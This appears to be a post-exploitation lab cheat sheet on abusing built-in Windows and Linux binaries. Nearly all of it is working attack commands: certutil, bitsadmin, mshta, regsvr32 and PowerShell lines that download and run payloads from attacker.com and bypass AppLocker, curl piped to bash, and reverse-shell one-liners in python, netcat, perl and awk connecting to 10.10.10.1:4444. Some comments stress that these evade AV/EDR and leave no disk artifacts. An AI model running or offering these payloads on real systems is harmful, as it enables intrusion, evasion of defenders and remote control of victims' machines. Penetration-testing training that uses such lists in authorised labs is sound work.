>_ Post-Exploitation Lab

> Living off the Land (LOLBins)

# LOLBins = use legitimate Windows/Linux binaries for malicious purposes
# Trusted by AV/EDR — no custom malware needed
# Reference: lolbas-project.github.io / gtfobins.github.io

# WINDOWS LOLBINS

# certutil — download files and encode/decode base64
certutil -urlcache -split -f http://attacker.com/payload.exe payload.exe
certutil -encode payload.exe encoded.b64   # encode to base64
certutil -decode encoded.b64 payload.exe  # decode

# mshta — run HTML Application files (bypasses AppLocker)
mshta http://attacker.com/payload.hta
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""cmd /c payload.exe"":Close")

# regsvr32 — load remote COM scriptlets (AppLocker bypass)
regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll

# wscript / cscript — run JavaScript/VBScript
wscript payload.js
cscript payload.vbs

# rundll32 — run DLL functions
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";...

# bitsadmin — download files silently
bitsadmin /transfer job http://attacker.com/payload.exe C:\temp\payload.exe

# powershell — download and execute in memory (no disk artifacts)
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/p.ps1')"

# LINUX LOLBINS

# curl / wget — download and execute
curl http://attacker.com/payload.sh | bash

# python — reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.10.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# nc (netcat) — reverse shell
nc -e /bin/sh 10.10.10.1 4444

# perl — reverse shell
perl -e 'use Socket;$i="10.10.10.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'

# awk — reverse shell
awk 'BEGIN{s="/inet/tcp/0/10.10.10.1/4444";for(;;){printf "> " |&s;if((s |& getline c)<=0)break;while((c |& getline)>0)print|&s;close(c)}}'